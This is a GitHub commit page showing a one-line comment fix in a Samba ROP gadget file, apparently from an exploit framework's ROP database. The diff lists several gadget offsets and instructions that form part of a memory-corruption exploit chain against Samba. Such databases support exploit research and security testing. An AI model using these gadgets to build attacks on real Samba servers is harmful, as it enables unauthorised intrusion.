Skip to content

Commit f819ec8

Browse files
author
m m
committed
typo
1 parent 3e3c518 commit f819ec8

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

data/ropdb/samba.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -116,7 +116,7 @@
116116
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
117117
<gadget offset="0x0006933f">pop eax; ret</gadget>
118118
<gadget offset="0x00083024">memcpy@got - 4</gadget>
119-
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
119+
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
120120
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
121121
<gadget offset="0x00004803">pop esi ; ret</gadget>
122122
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>

0 commit comments

Comments
 (0)